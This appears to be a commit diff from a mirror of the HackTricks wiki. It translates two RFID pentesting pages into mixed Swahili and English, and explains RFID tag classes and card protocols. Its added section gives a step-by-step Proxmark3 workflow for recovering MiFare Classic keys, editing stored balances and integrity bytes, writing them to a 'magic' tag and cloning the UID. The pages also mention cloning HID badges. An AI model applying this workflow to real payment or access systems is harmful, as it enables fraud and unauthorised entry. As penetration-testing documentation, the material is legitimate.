maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/todo/radio-hacking/proxmark-3.md', 'src/todo/radio-hack

Browse Source
This commit is contained in:
Translator 2025-09-29 12:55:29 +00:00
parent 4e5e92f066
commit 18dcc99bde
2 changed files with 134 additions and 50 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

125
src/todo/radio-hacking/pentesting-rfid.md
View File

@ -2,30 +2,30 @@
{{#include ../../banners/hacktricks-training.md}}
## Introduction
## Utangulizi
**Radio Frequency Identification (RFID)** ni suluhisho maarufu la redio la umbali mfupi. Kawaida hutumiwa kuhifadhi na kuhamasisha taarifa zinazotambulisha kitu.
**Utambuzi wa Mzunguko wa Redio (RFID)** ni suluhisho la redio la umbali mfupi lililo maarufu zaidi. Kwa kawaida hutumika kuhifadhi na kusambaza taarifa zinazomtambulisha kiumbe fulani.
Tag ya RFID inaweza kutegemea **chanzo chake cha nguvu (active)**, kama betri iliyojumuishwa, au kupokea nguvu yake kutoka kwa antenna ya kusoma kwa kutumia sasa **iliyopatikana kutoka kwa mawimbi ya redio yaliyopokelewa** (**passive**).
Tag ya RFID inaweza kutegemea **chanzo chake cha umeme (active)**, kama betri iliyojengewa ndani, au kupokea umeme wake kutoka kwenye antena ya kusoma kwa kutumia sasa **iliyootolewa kutokana na mawimbi ya redio yaliyopokelewa** (**passive**).
### Classes
### Madarasa
EPCglobal inagawanya tag za RFID katika makundi sita. Tag katika kila kundi ina uwezo wote ulioorodheshwa katika kundi la awali, na kuifanya iweze kufanya kazi na makundi ya zamani.
EPCglobal inagawanya tag za RFID katika makundi sita. Tag katika kila kundi ina uwezo wote uliotajwa katika kundi la awali, jambo linalofanya ziwe zenye ulinganifu wa nyuma.
- **Class 0** tags ni **passive** tags zinazofanya kazi katika **UHF** bendi. Mtoa huduma **anaziandaa** kabla ya uzalishaji. Kwa hivyo, huwezi **kubadilisha** taarifa zilizohifadhiwa katika kumbukumbu zao.
- **Class 1** tags pia zinaweza kufanya kazi katika **HF** bendi. Zaidi ya hayo, zinaweza **kuandikwa mara moja tu** baada ya uzalishaji. Tag nyingi za Class 1 zinaweza pia kushughulikia **cyclic redundancy checks** (CRCs) za amri wanazopokea. CRCs ni bytes chache za ziada mwishoni mwa amri kwa ajili ya kugundua makosa.
- **Class 2** tags zinaweza **kuandikwa mara nyingi**.
- **Class 3** tags zinaweza kuwa na **sensors zilizojumuishwa** ambazo zinaweza kurekodi vigezo vya mazingira, kama vile joto la sasa au mwendo wa tag. Tag hizi ni **semi-passive**, kwa sababu ingawa zina **chanzo cha nguvu** kilichojumuishwa, kama **betri** iliyounganishwa, hazina uwezo wa kuanzisha **mawasiliano** ya wireless na tag nyingine au wasomaji.
- **Class 4** tags zinaweza kuanzisha mawasiliano na tag nyingine za kundi hilo, na kuifanya kuwa **active tags**.
- **Class 5** tags zinaweza kutoa **nguvu kwa tag nyingine na kuwasiliana na makundi yote ya tag** yaliyotangulia. Tag za Class 5 zinaweza kutenda kama **RFID readers**.
- **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **cant change** the information stored in their memory.
- **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
- **Class 2** tags can be **written multiple times**.
- **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tags motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **cant initiate** wireless **communication** with other tags or readers.
- **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
- **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
### Information Stored in RFID Tags
Kumbukumbu ya tag ya RFID kawaida huhifadhi aina nne za data: **data ya utambulisho**, ambayo **inatambulisha** **kitu** ambacho tag imeunganishwa (data hii inajumuisha maeneo yaliyowekwa na mtumiaji, kama akaunti za benki); **data ya nyongeza**, ambayo inatoa **maelezo zaidi** kuhusu kitu; **data ya udhibiti**, inayotumika kwa **mipangilio** ya ndani ya tag; na **data ya mtengenezaji** wa tag, ambayo ina Kitambulisho Maalum cha Tag (**UID**) na maelezo kuhusu **uzalishaji**, **aina**, na **mtoa huduma** wa tag. Utapata aina mbili za kwanza za data katika tag zote za kibiashara; mbili za mwisho zinaweza kutofautiana kulingana na mtoa huduma wa tag.
An RFID tags memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tags internal **configuration**; and the tags **manufacturer data**, which contains a tags Unique Identifier (**UID**) and details regarding the tags **production**, **type**, and **vendor**. Youll find the first two kinds of data in all the commercial tags; the last two can differ based on the tags vendor.
Standards ya ISO inabainisha thamani ya Kitambulisho cha Familia ya Maombi (**AFI**), msimbo unaoashiria **aina ya kitu** ambacho tag inahusiana nacho. Usajili mwingine muhimu, pia ulioainishwa na ISO, ni Kitambulisho cha Muundo wa Hifadhi ya Data (**DSFID**), ambacho kinaelezea **mpangilio wa kimantiki wa data ya mtumiaji**.
The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
Mifumo mingi ya **udhibiti wa usalama** wa RFID ina mekanizimu ambazo **zinapunguza** operesheni za **kusoma** au **kuandika** kwenye kila kizuizi cha kumbukumbu ya mtumiaji na kwenye usajili maalum unaoshikilia thamani za AFI na DSFID. Mekanizimu hizi **zinazifunga** hutumia data iliyohifadhiwa katika kumbukumbu ya udhibiti na zina **nywila za default** zilizowekwa awali na mtoa huduma lakini zinawaruhusu wamiliki wa tag **kuunda nywila za kawaida**.
Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
### Low & High frequency tags comparison
@ -33,21 +33,21 @@ Mifumo mingi ya **udhibiti wa usalama** wa RFID ina mekanizimu ambazo **zinapung
## Low-Frequency RFID Tags (125kHz)
**Low-frequency tags** mara nyingi hutumiwa katika mifumo ambayo **hayahitaji usalama wa juu**: ufikiaji wa majengo, funguo za intercom, kadi za uanachama wa gym, n.k. Kutokana na umbali wao mrefu, ni rahisi kutumia kwa maegesho ya magari ya kulipia: dereva hahitaji kuleta kadi karibu na msomaji, kwani inasababishwa kutoka mbali. Wakati huo huo, low-frequency tags ni za msingi sana, zina kiwango cha chini cha uhamasishaji wa data. Kwa sababu hiyo, haiwezekani kutekeleza uhamasishaji wa data wa pande mbili kwa mambo kama kuhifadhi salio na cryptography. Low-frequency tags hutuma tu kitambulisho chao kifupi bila njia yoyote ya uthibitishaji.
**Low-frequency tags** are often used in systems that **do not require high security**: building access, intercom keys, gym membership cards, etc. Due to their higher range, they are convenient to use for paid car parking: the driver does not need to bring the card close to the reader, as it is triggered from further away. At the same time, low-frequency tags are very primitive, they have a low data transfer rate. For that reason, it's impossible to implement complex two-way data transfer for such things as keeping balance and cryptography. Low-frequency tags only transmit their short ID without any means of authentication.
Vifaa hivi vinategemea teknolojia ya **passive** **RFID** na vinafanya kazi katika **kasi ya 30 kHz hadi 300 kHz**, ingawa ni kawaida kutumia 125 kHz hadi 134 kHz:
These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz:
- **Long Range**frequency ya chini inamaanisha umbali mrefu. Kuna wasomaji wa EM-Marin na HID, ambao hufanya kazi kutoka umbali wa hadi mita moja. Hizi mara nyingi hutumiwa katika maegesho ya magari.
- **Primitive protocol**kutokana na kiwango cha chini cha uhamasishaji wa data, tag hizi zinaweza tu kutuma kitambulisho chao kifupi. Katika hali nyingi, data haithibitishwa na haijalindwa kwa njia yoyote. Mara tu kadi inapokuwa katika umbali wa msomaji, inaanza kutuma kitambulisho chake.
- **Low security**Kadi hizi zinaweza kunakiliwa kwa urahisi, au hata kusomwa kutoka mfukoni mwa mtu mwingine kutokana na msingi wa itifaki.
- **Long Range**lower frequency translates to higher range. There are some EM-Marin and HID readers, which work from a distance of up to a meter. These are often used in car parking.
- **Primitive protocol**due to the low data transfer rate these tags can only transmit their short ID. In most cases, data is not authenticated and it's not protected in any way. As soon as the card is in the range of the reader it just starts transmitting its ID.
- **Low security**These cards can be easily copied, or even read from somebody else's pocket due to the protocol's primitiveness.
**Protocols maarufu za 125 kHz:**
**Popular 125 kHz protocols:**
- **EM-Marin** — EM4100, EM4102. Itifaki maarufu zaidi katika CIS. Inaweza kusomwa kutoka takriban mita moja kutokana na urahisi na uthabiti wake.
- **HID Prox II**itifaki ya frequency ya chini iliyoanzishwa na HID Global. Itifaki hii ni maarufu zaidi katika nchi za magharibi. Ni ngumu zaidi na kadi na wasomaji wa itifaki hii ni ghali zaidi.
- **Indala**itifaki ya zamani ya frequency ya chini ambayo ilianzishwa na Motorola, na baadaye kununuliwa na HID. Una uwezekano mdogo wa kuikuta katika mazingira ikilinganishwa na mbili zilizotangulia kwa sababu inatolewa nje ya matumizi.
- **EM-Marin** — EM4100, EM4102. The most popular protocol in CIS. Can be read from about a meter because of its simplicity and stability.
- **HID Prox II**low-frequency protocol introduced by HID Global. This protocol is more popular in the western countries. It is more complex and the cards and readers for this protocol are relatively expensive.
- **Indala**very old low-frequency protocol that was introduced by Motorola, and later acquired by HID. You are less likely to encounter it in the wild compared to the previous two because it is falling out of use.
Kwa kweli, kuna itifaki nyingi zaidi za frequency ya chini. Lakini zote zinatumia moduli sawa kwenye tabaka la kimwili na zinaweza kuzingatiwa, kwa njia moja au nyingine, kama toleo la zile zilizoorodheshwa hapo juu.
In reality, there are a lot more low-frequency protocols. But they all use the same modulation on the physical layer and may be considered, in one way or another, a variation of those listed above.
### Attack
@ -60,24 +60,24 @@ flipper-zero/fz-125khz-rfid.md
## High-Frequency RFID Tags (13.56 MHz)
**High-frequency tags** hutumiwa kwa mwingiliano wa tag-msomaji wenye ugumu zaidi unapohitaji cryptography, uhamasishaji mkubwa wa data wa pande mbili, uthibitishaji, n.k.\
Kawaida hupatikana katika kadi za benki, usafiri wa umma, na pasi nyingine za usalama.
**High-frequency tags** are used for a more complex reader-tag interaction when you need cryptography, a large two-way data transfer, authentication, etc.\
It's usually found in bank cards, public transport, and other secure passes.
**High-frequency 13.56 MHz tags ni seti ya viwango na itifaki**. Kawaida hujulikana kama [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), lakini hiyo si sahihi kila wakati. Seti ya msingi ya itifaki inayotumika kwenye ngazi za kimwili na kimantiki ni ISO 14443. Itifaki za kiwango cha juu, pamoja na viwango mbadala (kama ISO 19092), zinategemea hiyo. Watu wengi hujulikana na teknolojia hii kama **Near Field Communication (NFC)**, neno linalotumika kwa vifaa vinavyofanya kazi kwenye frequency ya 13.56 MHz.
**High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
<figure><img src="../../images/image (930).png" alt=""><figcaption></figcaption></figure>
Kwa ufupi, usanifu wa NFC unafanya kazi kama ifuatavyo: itifaki ya uhamasishaji inachaguliwa na kampuni inayotengeneza kadi na kutekelezwa kulingana na kiwango cha chini cha ISO 14443. Kwa mfano, NXP iligundua itifaki yake ya uhamasishaji wa kiwango cha juu inayoitwa Mifare. Lakini kwenye kiwango cha chini, kadi za Mifare zinategemea kiwango cha ISO 14443-A.
To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
Flipper inaweza kuingiliana na itifaki ya kiwango cha chini ya ISO 14443, pamoja na itifaki ya uhamasishaji wa data ya Mifare Ultralight na EMV inayotumika katika kadi za benki. Tunafanya kazi kuongeza msaada kwa Mifare Classic na NFC NDEF. Kuangalia kwa kina itifaki na viwango vinavyounda NFC ni vyema kuwa na makala tofauti ambayo tunapanga kuwa nayo baadaye.
Flipper can interact with both the low-level ISO 14443 protocol, as well as Mifare Ultralight data transfer protocol and EMV used in bank cards. We're working on adding support for Mifare Classic and NFC NDEF. A thorough look at the protocols and standards that make up NFC is worth a separate article which we plan to have up later.
Kadi zote za frequency ya juu zinazotegemea kiwango cha ISO 14443-A zina Kitambulisho cha kipekee cha chip. Inafanya kazi kama nambari ya serial ya kadi, kama anwani ya MAC ya kadi ya mtandao. **Kawaida, UID ni urefu wa byte 4 au 7**, lakini inaweza nadra kufikia **hadi 10**. UIDs si siri na zinaweza kusomwa kwa urahisi, **wakati mwingine hata zimeandikwa kwenye kadi yenyewe**.
All high-frequency cards based on ISO 14443-A standard have a unique chip ID. It acts as the card's serial number, like a network card's MAC address. **Usually, the UID is 4 or 7 bytes long**, but can rarely go **up to 10**. UIDs are not a secret and they are easily readable, **sometimes even printed on the card itself**.
Kuna mifumo mingi ya udhibiti wa ufikiaji inayotegemea UID ili **kuhakiki na kutoa ufikiaji**. Wakati mwingine hii inatokea **hata** wakati tag za RFID **zinasaidia cryptography**. **Matumizi mabaya** kama haya yanazifanya kuwa sawa na kadi za **125 kHz** zisizo na akili kwa upande wa **usalama**. Kadi za virtual (kama Apple Pay) hutumia UID ya dinamik ili wamiliki wa simu wasifungue milango kwa kutumia programu yao ya malipo.
There are many access control systems that rely on UID to **authenticate and grant access**. Sometimes this happens **even** when RFID tags **support cryptography**. Such **misuse** brings them down to the level of the dumb **125 kHz cards** in terms of **security**. Virtual cards (like Apple Pay) use a dynamic UID so that phone owners won't go opening doors with their payment app.
- **Low range**kadi za frequency ya juu zimeundwa mahsusi ili ziweze kuwekwa karibu na msomaji. Hii pia husaidia kulinda kadi kutokana na mwingiliano usioidhinishwa. Umbali wa juu zaidi wa kusoma ambao tumefanikiwa kufikia ulikuwa takriban sentimita 15, na hiyo ilikuwa na wasomaji wa umbali mrefu waliotengenezwa kwa kawaida.
- **Advanced protocols**kasi za uhamasishaji wa data hadi 424 kbps zinaruhusu itifaki ngumu zenye uhamasishaji wa data wa pande mbili. Ambayo kwa upande mwingine **inaruhusu cryptography**, uhamasishaji wa data, n.k.
- **High security**kadi za frequency ya juu zisizo na mawasiliano hazina kasoro ikilinganishwa na kadi za smart. Kuna kadi zinazosaidia algorithms zenye nguvu za cryptography kama AES na kutekeleza cryptography isiyo ya kawaida.
- **Low range**high-frequency cards are specifically designed so that they would have to be placed close to the reader. This also helps to protect the card from unauthorized interactions. The maximum read range that we managed to achieve was about 15 cm, and that was with custom-made high-range readers.
- **Advanced protocols**data transfer speeds up to 424 kbps allow complex protocols with full-fledged two-way data transfer. Which in turn **allows cryptography**, data transfer, etc.
- **High security**high-frequency contactless cards are in no way inferior to smart cards. There are cards that support cryptographically strong algorithms like AES and implement asymmetrical cryptography.
### Attack
@ -88,16 +88,62 @@ You can **attack these Tags with the Flipper Zero**:
flipper-zero/fz-nfc.md
{{#endref}}
Au kwa kutumia **proxmark**:
Or using the **proxmark**:
{{#ref}}
proxmark-3.md
{{#endref}}
### Building a Portable HID MaxiProx 125 kHz Mobile Cloner
### MiFare Classic offline stored-value tampering (broken Crypto1)
Ikiwa unahitaji suluhisho la **umbali mrefu**, **linalotumia betri** kwa ajili ya kukusanya vitambulisho vya HID Prox® wakati wa shughuli za red-team, unaweza kubadilisha msomaji wa **HID MaxiProx 5375** uliowekwa ukutani kuwa cloner huru inayofaa kwenye begi la nyuma. Maelezo kamili ya kiufundi na umeme yanapatikana hapa:
When a system stores a monetary balance directly on a MiFare Classic card, you can often manipulate it because Classic uses NXPs deprecated Crypto1 cipher. Crypto1 has been broken for years, allowing recovery of sector keys and full read/write of card memory with commodity hardware (e.g., Proxmark3).
End-to-end workflow (abstracted):
1) Dump the original card and recover keys
```bash
# Attempt all built-in Classic key recovery attacks and dump the card
hf mf autopwn
```
Hii kwa kawaida hurudisha funguo za sekta (A/B) na kutengeneza dump kamili ya kadi katika folda ya client dumps.
2) Pata na uelewe value/integrity fields
- Fanya top-ups halali kwenye kadi ya asili na chukua dumps nyingi (kabla/baada).
- Fanya diff ya dumps mbili ili kubaini blocks/bytes zinazobadilika ambazo zinaonyesha balance na value/integrity fields yoyote.
- Deployments nyingi za Classic hutumia au "value block" encoding ya asili au hufanya checksums zao wenyewe (mfano, XOR ya balance na field nyingine na constant). Baada ya kubadilisha balance, hesabu upya integrity bytes ipasavyo na uhakikishe mashamba yote yaliyorudiwa/yanayokamilishwa yameendana.
3) Andika dump iliyobadilishwa kwenye writable “Chinese magic” Classic tag
```bash
# Load a modified binary dump onto a UID-changeable Classic tag
hf mf cload -f modified.bin
```
4) Clone UID asili ili terminals zitambue kadi
```bash
# Set the UID on a UID-changeable tag (gen1a/gen2 magic)
hf mf csetuid -u <original_uid>
```
5) Kutumia kwenye terminals
Vinasomaji vinavyomuamini salio kwenye kadi na UID vitakubali kadi iliyodanganywa. Uchunguzi wa uwanjani unaonyesha kuwa utekelezaji mwingi huweka kikomo salio kulingana na upana wa uwanja (kwa mfano, 16-bit fixed-point).
Notes
- Ikiwa mfumo unatumia native Classic value blocks, kumbuka muundo: value (4B) + ~value (4B) + value (4B) + block address + ~address. All parts must match.
- Kwa miundo maalum yenye checksums rahisi, differential analysis ni njia ya haraka zaidi ya kupata integrity function bila ku-reverse firmware.
- Tu UID-changeable tags ("Chinese magic" gen1a/gen2) zinaruhusu kuandika block 0/UID. Normal Classic cards have read-only UIDs.
Kwa amri za Proxmark3 za vitendo, tazama:
{{#ref}}
proxmark-3.md
{{#endref}}
### Kujenga Mobile Cloner wa Kubebeka wa HID MaxiProx 125 kHz
Ikiwa unahitaji suluhisho la **ya umbali mrefu**, **inayotumia betri** kwa kuvuna badges za HID Prox® wakati wa shughuli za red-team, unaweza kubadilisha reader ya ukutani **HID MaxiProx 5375** kuwa cloner huru inayofaa katika mkoba. Mwongozo wa kina wa mitambo na umeme upatikana hapa:
{{#ref}}
@ -106,9 +152,12 @@ maxiprox-mobile-cloner.md
---
## References
## Marejeo
- [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
- [Let's Clone a Cloner Part 3 (TrustedSec)](https://trustedsec.com/blog/lets-clone-a-cloner-part-3-putting-it-all-together)
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
- [MIFARE security overview (Wikipedia)](https://en.wikipedia.org/wiki/MIFARE#Security)
- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
{{#include ../../banners/hacktricks-training.md}}

59
src/todo/radio-hacking/proxmark-3.md
View File

@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## Kushambulia Mifumo ya RFID kwa Proxmark3
## Kushambulia Mfumo za RFID kwa Proxmark3
Jambo la kwanza unahitaji kufanya ni kuwa na [**Proxmark3**](https://proxmark.com) na [**kufunga programu na utegemezi wake**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
Kitu cha kwanza unachohitaji kufanya ni kuwa na [**Proxmark3**](https://proxmark.com) na [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
### Kushambulia MIFARE Classic 1KB
Ina **sehemu 16**, kila moja ina **blocks 4** na kila block ina **16B**. UID iko katika sehemu 0 block 0 (na haiwezi kubadilishwa).\
Ili kufikia kila sehemu unahitaji **funguo 2** (**A** na **B**) ambazo zimehifadhiwa katika **block 3 ya kila sehemu** (sehemu trailer). Sehemu trailer pia inahifadhi **vifungo vya ufikiaji** vinavyotoa **ruhusa za kusoma na kuandika** kwenye **kila block** kwa kutumia funguo 2.\
Funguo 2 ni muhimu kutoa ruhusa za kusoma ikiwa unajua ya kwanza na kuandika ikiwa unajua ya pili (kwa mfano).
Ina **16 sectors**, kila moja yao ina **4 blocks** na kila block ina **16B**. UID iko katika sector 0 block 0 (na haiwezi kubadilishwa).\
Ili kufikia kila sector unahitaji **2 keys** (**A** na **B**) ambazo zimetunzwa katika **block 3 of each sector** (sector trailer). Sector trailer pia inahifadhi **access bits** zinazotoa ruhusa za **read and write** kwenye **each block** zikitumia 2 keys.\
2 keys zinafaa kutoa ruhusa za kusoma ikiwa unajua key ya kwanza, na ruhusa za kuandika ikiwa unajua key ya pili (kwa mfano).
Mashambulizi kadhaa yanaweza kufanywa
Shambulizi kadhaa zinaweza kufanywa
```bash
proxmark3> hf mf #List attacks
@ -31,11 +31,39 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
Proxmark3 inaruhusu kufanya vitendo vingine kama **kusikiliza** mawasiliano ya **Tag na Reader** ili kujaribu kupata data nyeti. Katika kadi hii unaweza tu kusikiliza mawasiliano na kuhesabu funguo zilizotumika kwa sababu **operesheni za kijasusi zilizotumika ni dhaifu** na kujua maandiko ya wazi na maandiko ya cipher unaweza kuhesabu (`mfkey64` tool).
The Proxmark3 inaruhusu kufanya vitendo vingine kama **eavesdropping** ya **Tag to Reader communication** ili kujaribu kupata data nyeti. Katika kadi hii unaweza tu sniff mawasiliano na kuhesabu ufunguo uliotumika kwa sababu **cryptographic operations used are weak** na ukijua plain and cipher text unaweza kuuhesabu (`mfkey64` tool).
#### MiFare Classic mtiririko mfupi wa kazi kwa utumiaji mbaya wa thamani iliyohifadhiwa
Wakati terminals zinapohifadhi salio kwenye kadi za Classic, mtiririko wa kawaida kutoka mwanzo hadi mwisho ni:
```bash
# 1) Recover sector keys and dump full card
proxmark3> hf mf autopwn
# 2) Modify dump offline (adjust balance + integrity bytes)
# Use diffing of before/after top-up dumps to locate fields
# 3) Write modified dump to a UID-changeable ("Chinese magic") tag
proxmark3> hf mf cload -f modified.bin
# 4) Clone original UID so readers recognize the card
proxmark3> hf mf csetuid -u <original_uid>
```
Vidokezo
- `hf mf autopwn` inasimamia nested/darkside/HardNested-style attacks, inapata keys, na huunda dumps katika client dumps folder.
- Kuandika block 0/UID kunaweza kufanya kazi tu kwenye magic gen1a/gen2 cards. Kadi za Classic za kawaida zina UID ya read-only.
- Mipangilio mingi hutumia Classic "value blocks" au simple checksums. Hakikisha kuwa all duplicated/complemented fields na checksums zinabaki zikiwa sawia baada ya uhariri.
Tazama mbinu ya kiwango cha juu na hatua za kuzuia katika:
{{#ref}}
pentesting-rfid.md
{{#endref}}
### Amri Mbichi
Mifumo ya IoT wakati mwingine hutumia **vitambulisho visivyo na chapa au visivyo vya kibiashara**. Katika kesi hii, unaweza kutumia Proxmark3 kutuma **amri mbichi za kawaida kwa vitambulisho**.
Sistimu za IoT wakati mwingine hutumia **tags zisizo za chapa au zisizo za kibiashara**. Katika kesi hii, unaweza kutumia Proxmark3 kutuma **amri mbichi maalum kwa tags**.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
@ -45,14 +73,21 @@ No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
Kwa habari hii unaweza kujaribu kutafuta taarifa kuhusu kadi na kuhusu njia ya kuwasiliana nayo. Proxmark3 inaruhusu kutuma amri za moja kwa moja kama: `hf 14a raw -p -b 7 26`
Kwa taarifa hizi unaweza kujaribu kutafuta taarifa kuhusu kadi na kuhusu jinsi ya kuwasiliana nayo. Proxmark3 inaruhusu kutuma amri ghafi kama: `hf 14a raw -p -b 7 26`
### Scripts
### Skripti
Programu ya Proxmark3 inakuja na orodha ya **scripts za automatisering** zilizopakiwa awali ambazo unaweza kutumia kufanya kazi rahisi. Ili kupata orodha kamili, tumia amri ya `script list`. Kisha, tumia amri ya `script run`, ikifuatiwa na jina la script:
Programu ya Proxmark3 inakuja na orodha iliyopakiwa mapema ya **skripti za otomatiki** ambazo unaweza kutumia kutekeleza kazi rahisi. Ili kupata orodha kamili, tumia amri `script list`. Kisha, tumia amri `script run`, ikifuatiwa na jina la skripti:
```
proxmark3> script run mfkeys
```
Unaweza kuunda skripti ya **fuzz tag readers**, hivyo kunakili data ya **kadi halali** andika **Lua script** ambayo **randomize** moja au zaidi **bytes** za nasibu na uangalie kama **reader inashindwa** na iteration yoyote.
Unaweza kuunda script ya **fuzz tag readers**; kwa kunakili data ya **valid card**, andika tu **Lua script** inayofanya **randomize** kwa mmoja au zaidi wa **bytes** za nasibu, kisha angalia ikiwa **reader crashes** kwa mzunguko wowote.
## Marejeo
- [Proxmark3 wiki: HF MIFARE](https://github.com/RfidResearchGroup/proxmark3/wiki/HF-Mifare)
- [Proxmark3 wiki: HF Magic cards](https://github.com/RfidResearchGroup/proxmark3/wiki/HF-Magic-cards)
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
{{#include ../../banners/hacktricks-training.md}}